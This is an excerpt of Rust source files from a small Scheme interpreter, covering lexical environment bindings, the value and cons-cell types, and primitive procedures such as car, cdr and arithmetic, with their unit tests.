pub fn extend(&mut self, names: Vec<String>) { self.bindings.push(HashMap::new()); for n in names.into_iter() { self.define(n); } } /// Pop off the youngest lexical block. pub fn pop(&mut self) { assert!(self.bindings.len() > 1, "Should never pop off the global environment"); self.bindings.pop(); } /// Define a variable in the youngest block and return the coordinates to /// get its value from an activation at runtime. pub fn define(&mut self, name: String) -> (u32, u32) { if let Some(n) = self.youngest().get(&name) { return (0, *n); } let n = self.youngest().len() as u32; self.youngest().insert(name, n); return (0, n); } /// Define a global variable and return its activation coordinates. pub fn define_global(&mut self, name: String) -> (u32, u32) { let n = self.bindings[0].len() as u32; self.bindings[0].insert(name, n); return ((self.bindings.len() - 1) as u32, n); } /// Get the activation coordinates associated with the given variable name. pub fn lookup(&self, name: &String) -> Option<(u32, u32)> { for (i, bindings) in self.bindings.iter().rev().enumerate() { if let Some(j) = bindings.get(name) { return Some((i as u32, *j)); } } return None; } fn youngest<'a>(&'a mut self) -> &'a mut HashMap<String, u32> { let last_idx = self.bindings.len() - 1; &mut self.bindings[last_idx] } }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/value.rs
src/value.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Scheme value implementation. use std::collections::{HashSet}; use std::default::{Default}; use std::fmt; use std::hash; use environment::{ActivationPtr, RootedActivationPtr}; use eval::{Meaning, TrampolineResult}; use heap::{ArenaPtr, GcThing, Heap, IterGcThing, Rooted, RootedStringPtr, StringPtr, ToGcThing, Trace}; use primitives::{PrimitiveFunction}; /// A cons cell is a pair of `car` and `cdr` values. A list is one or more cons /// cells, daisy chained together via the `cdr`. A list is "proper" if the last /// `cdr` is `Value::EmptyList`, or the scheme value `()`. Otherwise, it is /// "improper". #[derive(Copy, Eq, Hash, PartialEq)] pub struct Cons { car: Value, cdr: Value, } impl Default for Cons { /// Do not use this method, instead allocate cons cells on the heap with /// `Heap::allocate_cons` and get back a `ConsPtr`. fn default() -> Cons { Cons { car: Value::EmptyList, cdr: Value::EmptyList, } } } impl Cons { /// Get the car of this cons cell. pub fn car(&self, heap: &mut Heap) -> RootedValue { Rooted::new(heap, self.car) } /// Get the cdr of this cons cell. pub fn cdr(&self, heap: &mut Heap) -> RootedValue { Rooted::new(heap, self.cdr) } /// Set the car of this cons cell. pub fn set_car(&mut self, car: &RootedValue) { self.car = **car; } /// Set the cdr of this cons cell. 
pub fn set_cdr(&mut self, cdr: &RootedValue) { self.cdr = **cdr; } } impl Trace for Cons { fn trace(&self) -> IterGcThing { let mut results = vec!(); if let Some(car) = self.car.to_gc_thing() { results.push(car); } if let Some(cdr) = self.cdr.to_gc_thing() { results.push(cdr); } results.into_iter() } } /// A pointer to a cons cell on the heap. pub type ConsPtr = ArenaPtr<Cons>; impl ToGcThing for ConsPtr { fn to_gc_thing(&self) -> Option<GcThing> { Some(GcThing::from_cons_ptr(*self)) } } /// A rooted pointer to a cons cell on the heap. pub type RootedConsPtr = Rooted<ConsPtr>; /// User defined procedures are represented by their body and a pointer to the /// activation that they were defined within. pub struct Procedure { pub arity: u32, pub body: Option<Box<Meaning>>, pub act: Option<ActivationPtr>, } impl Default for Procedure { fn default() -> Procedure { Procedure { body: None, act: None, arity: 0, } } } impl Trace for Procedure { fn trace(&self) -> IterGcThing { // We don't need to trace the body because a `Meaning` can only contain // rooted GC things to ensure that quotations will always return the // same object rather than generate new equivalent-but-not-`eq?` // objects. vec!(GcThing::from_activation_ptr(self.act.expect( "Should never trace an uninitialized Procedure"))).into_iter() } } impl hash::Hash for Procedure { fn hash<H: hash::Hasher>(&self, state: &mut H) { self.arity.hash(state); self.act.hash(state); self.body.as_ref() .expect("Should never hash an uninitialized Procedure") .hash(state); } } /// A pointer to a `Procedure` on the heap. pub type ProcedurePtr = ArenaPtr<Procedure>; impl ToGcThing for ProcedurePtr { fn to_gc_thing(&self) -> Option<GcThing> { Some(GcThing::from_procedure_ptr(*self)) } } /// A rooted pointer to a `Procedure` on the heap. pub type RootedProcedurePtr = Rooted<ProcedurePtr>; /// A primitive procedure, such as Scheme's `+` or `cons`. #[derive(Copy)] pub struct Primitive { /// The function implementing the primitive. 
function: PrimitiveFunction, /// The name of the primitive. name: &'static str, } impl PartialEq for Primitive { fn eq(&self, rhs: &Self) -> bool { self.function as usize == rhs.function as usize } } impl Eq for Primitive { } impl hash::Hash for Primitive { fn hash<H: hash::Hasher>(&self, state: &mut H) { let u = self.function as usize; u.hash(state); } } impl Primitive { #[inline] pub fn call(&self, heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { (self.function)(heap, args) } } impl fmt::Debug for Primitive { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.name) } } /// `Value` represents a scheme value of any type. /// /// Note that `Eq` and `PartialEq` are object identity, not structural /// comparison, same as with [`ArenaPtr`](struct.ArenaPtr.html). #[derive(Copy, Eq, Hash, PartialEq, Debug)] pub enum Value { /// The empty list: `()`. EmptyList, /// The scheme pair type is a pointer to a GC-managed `Cons` cell. Pair(ConsPtr), /// The scheme string type is a pointer to a GC-managed `String`. String(StringPtr), /// Scheme symbols are also implemented as a pointer to a GC-managed /// `String`. Symbol(StringPtr), /// Scheme integers are represented as 64 bit integers. Integer(i64), /// Scheme booleans are represented with `bool`. Boolean(bool), /// Scheme characters are `char`s. Character(char), /// A user-defined Scheme procedure is a pointer to a GC-managed /// `Procedure`. Procedure(ProcedurePtr), /// A primitive Scheme procedure is just a pointer to a `Primitive` type /// function pointer. Primitive(Primitive), } /// # `Value` Constructors impl Value { /// Create a new integer value. pub fn new_integer(i: i64) -> Value { Value::Integer(i) } /// Create a new boolean value. pub fn new_boolean(b: bool) -> Value { Value::Boolean(b) } /// Create a new character value. pub fn new_character(c: char) -> Value { Value::Character(c) } /// Create a new cons pair value with the given car and cdr. 
pub fn new_pair(heap: &mut Heap, car: &RootedValue, cdr: &RootedValue) -> RootedValue { let mut cons = heap.allocate_cons(); cons.set_car(car); cons.set_cdr(cdr); Rooted::new(heap, Value::Pair(*cons)) } /// Create a new procedure with the given parameter list and body. pub fn new_procedure(heap: &mut Heap, arity: u32, act: &RootedActivationPtr, body: Meaning) -> RootedValue { let mut procedure = heap.allocate_procedure(); procedure.arity = arity; procedure.act = Some(**act); procedure.body = Some(Box::new(body)); Rooted::new(heap, Value::Procedure(*procedure)) } pub fn new_primitive(name: &'static str, function: PrimitiveFunction) -> Value { Value::Primitive(Primitive { name: name, function: function }) } /// Create a new string value with the given string. pub fn new_string(heap: &mut Heap, str: String) -> RootedValue { let mut value = heap.allocate_string(); value.clear(); value.push_str(str.as_slice()); Rooted::new(heap, Value::String(*value)) } /// Create a new symbol value with the given string. pub fn new_symbol(heap: &mut Heap, str: RootedStringPtr) -> RootedValue { Rooted::new(heap, Value::Symbol(*str)) } } /// # `Value` Methods impl Value { /// Assuming this value is a cons pair, get its car value. Otherwise, return /// `None`. pub fn car(&self, heap: &mut Heap) -> Option<RootedValue> { match *self { Value::Pair(ref cons) => Some(cons.car(heap)), _ => None, } } /// Assuming this value is a cons pair, get its cdr value. Otherwise, return /// `None`. pub fn cdr(&self, heap: &mut Heap) -> Option<RootedValue> { match *self { Value::Pair(ref cons) => Some(cons.cdr(heap)), _ => None, } } /// Return true if this value is a pair, false otherwise. pub fn is_pair(&self) -> bool { match *self { Value::Pair(_) => true, _ => false, } } /// Return true if this value is an atom, false otherwise. pub fn is_atom(&self) -> bool { !self.is_pair() } /// Coerce this symbol value to a `StringPtr` to the symbol's string name. 
pub fn to_symbol(&self, heap: &mut Heap) -> Option<RootedStringPtr> { match *self { Value::Symbol(sym) => Some(Rooted::new(heap, sym)), _ => None, } } /// Coerce this pair value to a `ConsPtr` to the cons cell this pair is /// referring to. pub fn to_pair(&self, heap: &mut Heap) -> Option<RootedConsPtr> { match *self { Value::Pair(cons) => Some(Rooted::new(heap, cons)), _ => None, } } /// Coerce this procedure value to a `ProcedurePtr` to the `Procedure` this /// value is referring to. pub fn to_procedure(&self, heap: &mut Heap) -> Option<RootedProcedurePtr> { match *self { Value::Procedure(p) => Some(Rooted::new(heap, p)), _ => None, } } /// Coerce this integer value to its underlying `i64`. pub fn to_integer(&self) -> Option<i64> { match *self { Value::Integer(ref i) => Some(*i), _ => None, } } /// Assuming that this value is a proper list, get the length of the list. pub fn len(&self) -> Result<u64, ()> { match *self { Value::EmptyList => Ok(0), Value::Pair(p) => { let cdr_len = try!(p.cdr.len()); Ok(cdr_len + 1) }, _ => Err(()), } } /// Iterate over this list value. 
pub fn iter(&self) -> ConsIterator { ConsIterator { val: *self } } } impl ToGcThing for Value { fn to_gc_thing(&self) -> Option<GcThing> { match *self { Value::String(str) => Some(GcThing::from_string_ptr(str)), Value::Symbol(sym) => Some(GcThing::from_string_ptr(sym)), Value::Pair(cons) => Some(GcThing::from_cons_ptr(cons)), Value::Procedure(p) => Some(GcThing::from_procedure_ptr(p)), _ => None, } } } fn print(f: &mut fmt::Formatter, val: &Value, seen: &mut HashSet<ConsPtr>) -> fmt::Result { match *val { Value::EmptyList => write!(f, "()"), Value::Pair(ref cons) => { try!(write!(f, "(")); try!(print_pair(f, cons, seen)); write!(f, ")") }, Value::String(ref str) => { try!(write!(f, "\"")); try!(write!(f, "{}", **str)); write!(f, "\"") }, Value::Symbol(ref s) => write!(f, "{}", **s), Value::Integer(ref i) => write!(f, "{}", i), Value::Boolean(ref b) => { write!(f, "{}", if *b { "#t" } else { "#f" }) }, Value::Character(ref c) => match *c { '\n' => write!(f, "#\\newline"), '\t' => write!(f, "#\\tab"), ' ' => write!(f, "#\\space"), _ => write!(f, "#\\{}", c), }, Value::Procedure(ref p) => write!(f, "#<procedure {:?}>", p), Value::Primitive(ref p) => write!(f, "#<procedure {:?}>", p), } } /// Print the given cons pair, without the containing "(" and ")". fn print_pair(f: &mut fmt::Formatter, cons: &ConsPtr, seen: &mut HashSet<ConsPtr>) -> fmt::Result { if seen.contains(cons) { return write!(f, "<cyclic value>"); } seen.insert(*cons); try!(print(f, &cons.car, seen)); if let Value::Pair(rest) = cons.cdr { if seen.contains(&rest) { return write!(f, " . <cyclic value>"); } } match cons.cdr { Value::EmptyList => Ok(()), Value::Pair(ref cdr) => { try!(write!(f, " ")); print_pair(f, cdr, seen) }, ref val => { try!(write!(f, " . ")); print(f, val, seen) }, } } impl fmt::Display for Value { /// Print the given value's text representation to the given writer. This is /// the opposite of `Read`. 
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { print(f, self, &mut HashSet::new()) } } pub type RootedValue = Rooted<Value>; /// Either a Scheme `RootedValue`, or a `String` containing an error message. pub type SchemeResult = Result<RootedValue, String>; /// An iterator which yields `Ok` for each value in a cons-list and finishes /// with `None` when the end of the list is reached (the scheme empty list /// value) or `Err` when iterating over an improper list. /// /// For example: the list `(1 2 3)` would yield `Ok(1)`, `Ok(2)`, `Ok(3)`, /// `None`, while the improper list `(1 2 . 3)` would yield `Ok(1)`, `Ok(2)`, /// `Err`. #[derive(Copy)] pub struct ConsIterator { val: Value } impl Iterator for ConsIterator { type Item = Result<Value, ()>; fn next(&mut self) -> Option<Result<Value, ()>> { match self.val { Value::EmptyList => None, Value::Pair(cons) => { let Cons { car, cdr } = *cons; self.val = cdr; Some(Ok(car)) }, _ => Some(Err(())), } } } /// A helper utility to create a cons list from the given values. pub fn list(heap: &mut Heap, values: &[RootedValue]) -> RootedValue { list_helper(heap, &mut values.iter()) } fn list_helper<'a, T: Iterator<Item=&'a RootedValue>>(heap: &mut Heap, values: &mut T) -> RootedValue { match values.next() { None => Rooted::new(heap, Value::EmptyList), Some(car) => { let rest = list_helper(heap, values); Value::new_pair(heap, car, &rest) }, } } /// ## The 28 car/cdr compositions. 
impl Cons { pub fn cddr(&self, heap: &mut Heap) -> SchemeResult { self.cdr.cdr(heap).ok_or("bad cddr".to_string()) } pub fn cdddr(&self, heap: &mut Heap) -> SchemeResult { let cddr = try!(self.cddr(heap)); cddr.cdr(heap).ok_or("bad cdddr".to_string()) } // TODO FITZGEN: cddddr pub fn cadr(&self, heap: &mut Heap) -> SchemeResult { self.cdr.car(heap).ok_or("bad cadr".to_string()) } pub fn caddr(&self, heap: &mut Heap) -> SchemeResult { let cddr = try!(self.cddr(heap)); cddr.car(heap).ok_or("bad caddr".to_string()) } pub fn cadddr(&self, heap: &mut Heap) -> SchemeResult { let cdddr = try!(self.cdddr(heap)); cdddr.car(heap).ok_or("bad caddr".to_string()) } // TODO FITZGEN ... } #[cfg(test)] mod tests { use eval::{evaluate_file}; use heap::{Heap}; #[test] fn test_print_cycle() { let heap = &mut Heap::new(); evaluate_file(heap, "./tests/test_print_cycle.scm") .ok() .expect("Should be able to eval a file."); assert!(true, "Shouldn't get stuck in an infinite loop printing a cyclic value"); } }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/primitives.rs
src/primitives.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Implementation of primitive procedures. use environment::{ActivationPtr, Environment}; use eval::{apply_invocation, Trampoline, TrampolineResult}; use heap::{Heap, Rooted}; use read::{Read}; use value::{RootedValue, Value}; /// The function signature for primitives. pub type PrimitiveFunction = fn(&mut Heap, Vec<RootedValue>) -> TrampolineResult; fn cons(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref car, ref cdr] = args.as_slice() { Ok(Trampoline::Value(Value::new_pair(heap, car, cdr))) } else { Err("Error: bad arguments to `cons`".to_string()) } } fn car(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { arg.car(heap) .ok_or(format!("Error: cannot take car of non-cons: {}", **arg)) .map(|v| Trampoline::Value(v)) } else { Err("Error: bad arguments to `car`".to_string()) } } fn set_car_bang(heap: &mut Heap, mut args: Vec<RootedValue>) -> TrampolineResult { if let [ref mut cons, ref val] = args.as_mut_slice() { if let &mut Value::Pair(ref mut cons) = &mut **cons { cons.set_car(val); return Ok(Trampoline::Value(heap.unspecified_symbol())); } return Err(format!("Can't set-car! 
on non-cons: {}", **cons)); } else { Err("Error: bad arguments to `set-car!`".to_string()) } } fn cdr(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { arg.cdr(heap) .ok_or(format!("Error: cannot take cdr of non-cons: {}", **arg)) .map(|v| Trampoline::Value(v)) } else { Err("Error: bad arguments to `cdr`".to_string()) } } fn set_cdr_bang(heap: &mut Heap, mut args: Vec<RootedValue>) -> TrampolineResult { if let [ref mut cons, ref val] = args.as_mut_slice() { if let &mut Value::Pair(ref mut cons) = &mut **cons { cons.set_cdr(val); return Ok(Trampoline::Value(heap.unspecified_symbol())); } return Err(format!("Can't set-cdr! on non-cons: {}", **cons)); } else { Err("Error: bad arguments to `set-cdr!`".to_string()) } } fn list(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { use value; Ok(Trampoline::Value(value::list(heap, args.as_slice()))) } fn length(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { let len = try!(arg.len().ok().ok_or( format!("Error: can only take length of proper lists, got {}", **arg))); Ok(Trampoline::Value(Rooted::new(heap, Value::new_integer(len as i64)))) } else { Err("Error: bad arguments to `length`".to_string()) } } fn apply(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { // Note: we don't support concatenating many argument lists yet: // // (apply f '(1 2) '(3 4)) == (apply f '(1 2 3 4)) // // We should suport that eventually. 
if let [ref proc_val, ref args] = args.as_slice() { let v : Vec<RootedValue> = try!(args.iter() .map(|result_val| { result_val .map(|r| Rooted::new(heap, r)) .map_err(|_| "Must pass a proper list to `apply`".to_string()) }) .collect()); apply_invocation(heap, proc_val, v) } else { Err("Error: bad arguments to `apply`".to_string()) } } fn error(_: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { let mut string = String::from_str("ERROR!"); for val in args.iter() { string.push_str(format!("\n\t{}", **val).as_slice()); } Err(string) } fn print(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { for val in args.iter() { println!("{}", **val); } Ok(Trampoline::Value(heap.unspecified_symbol())) } fn read(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { // Only supports reading from stdin right now. use std::old_io; if args.len() != 0 { return Err("`read` called with too many parameters".to_string()); } let stdin = old_io::stdio::stdin(); let reader = Read::new(stdin, heap, "stdin".to_string()); for (_, read_result) in reader { let form = try!(read_result); return Ok(Trampoline::Value(form)); } Ok(Trampoline::Value(heap.eof_symbol())) } fn not(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Boolean(b) if b == false => true, _ => false, })))) } else { Err("Error: bad arguments to `not`".to_string()) } } fn null_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value( Rooted::new(heap, Value::new_boolean(**arg == Value::EmptyList)))) } else { Err("Error: bad arguments to `null?`".to_string()) } } fn pair_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Pair(_) => true, _ => false, })))) } else { 
Err("Error: bad arguments to `pair?`".to_string()) } } fn atom_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Pair(_) => false, _ => true, })))) } else { Err("Error: bad arguments to `atom?`".to_string()) } } fn eq_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(*a == *b)))) } else { Err("Error: bad arguments to `eq?`".to_string()) } } fn symbol_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Symbol(_) => true, _ => false })))) } else { Err("Error: bad arguments to `symbol?`".to_string()) } } fn number_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Integer(_) => true, _ => false })))) } else { Err("Error: bad arguments to `number?`".to_string()) } } fn string_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::String(_) => true, _ => false })))) } else { Err("Error: bad arguments to `string?`".to_string()) } } fn number_equal(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `=` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `=` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_boolean(first == second)))) } else { Err("Error: bad arguments to `=`".to_string()) } } fn gt(heap: &mut Heap, args: 
Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `>` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `>` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_boolean(first > second)))) } else { Err("Error: bad arguments to `>`".to_string()) } } fn lt(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `<` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `<` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_boolean(first < second)))) } else { Err("Error: bad arguments to `<`".to_string()) } } fn add(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `+` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `+` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_integer(first + second)))) } else { Err("Error: bad arguments to `+`".to_string()) } } fn subtract(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `-` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `-` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_integer(first - second)))) } else { Err("Error: bad arguments to `-`".to_string()) } } fn divide(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `/` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: 
cannot use `/` with non-numbers".to_string())); if second == 0 { return Err("Error: divide by zero".to_string()); } Ok(Trampoline::Value( Rooted::new(heap, Value::new_integer(first / second)))) } else { Err("Error: bad arguments to `/`".to_string()) } } fn multiply(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `*` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `*` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_integer(first * second)))) } else { Err("Error: bad arguments to `*`".to_string()) } } fn define_primitive(env: &mut Environment, act: &mut ActivationPtr, name: &'static str, function: PrimitiveFunction) { let (i, j) = env.define(name.to_string()); assert!(i == 0, "All primitives should be defined on the global activation"); act.define(j, Value::new_primitive(name, function)); } pub fn define_primitives(env: &mut Environment, act: &mut ActivationPtr) { define_primitive(env, act, "cons", cons); define_primitive(env, act, "car", car); define_primitive(env, act, "set-car!", set_car_bang); define_primitive(env, act, "cdr", cdr); define_primitive(env, act, "set-cdr!", set_cdr_bang); define_primitive(env, act, "list", list); define_primitive(env, act, "length", length); define_primitive(env, act, "apply", apply); define_primitive(env, act, "error", error); define_primitive(env, act, "print", print); define_primitive(env, act, "read", read); define_primitive(env, act, "not", not); define_primitive(env, act, "null?", null_question); define_primitive(env, act, "pair?", pair_question); define_primitive(env, act, "atom?", atom_question); define_primitive(env, act, "eq?", eq_question); define_primitive(env, act, "symbol?", symbol_question); define_primitive(env, act, "number?", number_question); define_primitive(env, act, "string?", string_question); define_primitive(env, 
act, "=", number_equal); define_primitive(env, act, ">", gt); define_primitive(env, act, "<", lt); define_primitive(env, act, "+", add); define_primitive(env, act, "-", subtract); define_primitive(env, act, "/", divide); define_primitive(env, act, "*", multiply); } // TESTS ----------------------------------------------------------------------- #[cfg(test)] mod tests { use eval::{evaluate_file}; use heap::{Heap}; use value::{Value}; #[test] fn test_primitives_cons() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_cons.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_integer(1)); assert_eq!(*pair.cdr(heap), Value::new_integer(2)); } #[test] fn test_primitives_car() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_car.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(1)); } #[test] fn test_primitives_set_car() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_set_car.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_integer(1)); assert_eq!(*pair.cdr(heap), Value::new_integer(2)); } #[test] fn test_primitives_cdr() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_cdr.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(2)); } #[test] fn test_primitives_set_cdr() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_set_cdr.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_integer(1)); assert_eq!(*pair.cdr(heap), Value::new_integer(2)); } #[test] fn 
test_primitives_list() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_list.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_integer(1)); assert_eq!(*pair.cadr(heap).ok().expect("pair.cadr"), Value::new_integer(2)); assert_eq!(*pair.caddr(heap).ok().expect("pair.caddr"), Value::new_integer(3)); assert_eq!(*pair.cdddr(heap).ok().expect("pair.cdddr"), Value::EmptyList); } #[test] fn test_primitives_length() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_length.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(3)); } #[test] fn test_primitives_apply() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_apply.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(3)); } #[test] fn test_primitives_error() { let heap = &mut Heap::new(); let error = evaluate_file(heap, "./tests/test_primitives_error.scm") .err() .expect("Should get an error evaluating this file."); assert_eq!(error, "./tests/test_primitives_error.scm:1:1:\n\ ERROR!\n\ \t\"got an error:\"\n\ \t(1 2)"); } #[test] fn test_primitives_not() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_not.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_null() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_null.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), 
Value::new_boolean(false)); } #[test] fn test_primitives_arithmetic() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_arithmetic.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(42)); } #[test] fn test_primitives_pair() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_pair.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_atom() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_atom.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_eq() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_eq.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_symbol_question() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_symbol_question.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_number_question() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_number_question.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result 
